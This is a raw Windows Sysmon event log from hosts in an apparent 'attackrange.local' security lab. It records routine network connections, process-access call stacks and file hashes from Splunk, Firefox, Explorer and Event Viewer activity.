SERVICEudpfalsefalse10.0.1.15win-host-14.attackrange.local63000-false10.0.1.14ip-10-0-1-14.us-west-2.compute.internal53domain 354300x8000000000000000149311Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:21.201{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10f:0:0:c8a0:91a7:8add:ffff-63000-truea00:10e:0:0:0:0:0:0ip-10-0-1-14.us-west-2.compute.internal53domain 10341000x8000000000000000104504Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:24.309{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD18-60C9-1500-00000000CF01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104503Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:24.309{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD18-60C9-1500-00000000CF01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104502Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:24.309{54715871-FD18-60C9-0C00-00000000CF01}8485316C:\Windows\system32\svchost.exe{54715871-FD18-60C9-1500-00000000CF01}1252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149316Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:24.440{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05B5AD511E64DDFD2CC0E1389BDCA5E2,SHA256=E65D463765AC89802701997CF266F93705216943AF093F1BA0B8DE9208A686ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104506Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:23.763{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55381-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000104505Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:25.594{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB007644CECE4FAE77FF0D11E465E599,SHA256=E90FEF6312BBDD812F6CA684818AF68B386B6886244493746431A6B064444ACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149328Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.625{39BD8DE3-0FD9-60CA-8700-00000000D101}3216WIN-HOST-14\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\23LO39NT\views[1]MD5=A726593A8261930E4786375106FC6BFE,SHA256=E6BFDFBB9A0649EA9D38DE4255C355C581097E6A1035A54943260B22AD45F172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149327Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.625{39BD8DE3-0FD9-60CA-8700-00000000D101}3216WIN-HOST-14\AdministratorC:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\INetCache\IE\72452VNE\views[1]MD5=BEE1758A485085BB8A121EB74BA7E96F,SHA256=EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149326Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149325Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149324Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149323Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149322Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149321Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149320Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.579{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149319Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.441{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D369E20E6F670A75050AB3D43334C03,SHA256=687B643ADA23CAD4EE77E472B4D469187A9A95F32B27788B4E73F7769CB84CDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000149318Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:23.976{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58323-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000149317Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:25.178{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=361D9884FA8DE441A7F925BC43798955,SHA256=A91F5B6820399E8299A429F7362EE1AFF38C158A7F07CB395E05A557B7890943,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149346Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.936{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=0B6523432E7615B83ED143BF24E01878,SHA256=9F76771DA231654C7703BFEA54F2939FC4B3EDA036E574DA0544D9F0E3B1F63A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149345Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.935{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=4111C9C0E16740A10F2B99054D6BB5B9,SHA256=0C081983F87CE539632F602CA4EA8EA5EDC5B670B0822DC20DCA1E4D7A6F2E7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149344Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.933{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=8135DCFE1AA5171A6C67BAE1CFBDF46E,SHA256=74D6B43DAD554536973B44F911989C085CC33A4625053A530B9376FD569B94EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149343Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.928{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=01652E562D8150656C6828DC0E43ADAF,SHA256=DBCEEB00F04473546300527EF7EFC9E7C6D801B1EB81135B6780F0BD7A8E85C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149342Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.926{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=AD935E1F41C578A5FAE69AA303CA4F95,SHA256=4F7C8EFB703750B1F9670854E793D5F81FA5F8F51ECEDA7ECA333A734B67754F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149341Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.919{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=723635511364C91035EA199C418A1C1D,SHA256=2BA9D53036B1322920DBB1182C3D57064A7F2F941CF5BF2FE6C449C000AF5DA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149340Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.915{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=1427C7FE9AD29885CE9DE0372875B994,SHA256=3C78C018AB2A7EA7DE40DDF2CCE8CC97377E37EB086EF138B562CA5E8C6F413D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149339Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.912{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=A0674E8F9948D974DB50FFC8B3997C62,SHA256=DAFE383E2F0EC92A86B48B385AF372D59970B0746C0DF8E7F0E3C68795526869,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149338Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.911{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149337Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.911{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149336Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.911{39BD8DE3-0FD9-60CA-8B00-00000000D101}19885768C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149335Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.905{39BD8DE3-131D-60CA-0B01-00000000D101}1192WIN-HOST-14\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\rk0lnaq8.default-release\datareporting\glean\db\data.safe.binMD5=290A69E32AC2E3932A682617FBC662EE,SHA256=F393A9DD1F9E43EE8986C2A5B7D81704C04A829BF36D7FEB279114E62107B24E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000149334Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.902{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149333Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.902{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149332Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.902{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149331Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.902{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-24EC-60CA-7703-00000000D101}3656C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000149330Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.455{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7D1FA87DC503A3B06660510CEB5A6C5,SHA256=A56E0CB3E8FBA6CE2818F158F76C5E0FFE37A26F9B1B28006F4E49B71B503F16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149329Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:26.286{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CA3458ED2EA5D627C04A1486CEE9069,SHA256=1EC74725F6F06FFDAC241A84E6105487E12CF2D551B87ED716C709B8E4EA20DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104507Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:43:27.001{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD5F643CB816F728DF2DD5CE05DD0C6B,SHA256=0EE4D84EDE0D7E965CEA2F81A8F59CB623716A3765B2CEE2A02AEAE5A429AA68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149353Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.985{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=507DB78626849B85E8F1A5774A09F6DB,SHA256=A6758C51F9DFDBC864E1498F876E903F011FEC1318DBF100DF8D43D638CACD44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149352Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.483{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F8FC0BA4B63D1BFA28D5FD6F07E83B9,SHA256=9977B560AD568D376859F6C8FA429EA6D107074527681A70D455F2AFFE10AF9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149351Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.170{39BD8DE3-2344-60CA-0D03-00000000D101}4992WIN-HOST-14\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Event Viewer\Settings.XmlMD5=207E068C6F991A1C3A2B6BF2C2C1DFE1,SHA256=4D21C51468348C10DE3077EB09D830F13171DFC46BAB6FC776555821C37ABC81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149350Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.169{39BD8DE3-2344-60CA-0D03-00000000D101}4992WIN-HOST-14\AdministratorC:\Windows\system32\mmc.exeC:\ProgramData\Microsoft\Event Viewer\Applications and Services Logs\Microsoft\Windows\WMI-Activity\Channel_0.xmlMD5=F69C6F9CAA02B4BB9184B036AA2ADE14,SHA256=120F96EE9F61682C5605AC5247007E9D0BC03AB43924865753E0F59266D056BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000149349Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:27.163{39BD8DE3-2344-60CA-0D03-00000000D101}4992WIN-HOST-14\AdministratorC:\Windows\system32\mmc.exeC:\Users\Administrator\AppData\Local\Microsoft\Event Viewer\RecentViewsMD5=D298B415CA1F86B3909150BB2ECDF2EC,SHA256=747BFB61CCB4BD7CFAC809BC9D82B8C52FA364DA8FB94854A8A3D8A6C93D6D96,IMPHASH=00000000000000000000000000000000falsetrue 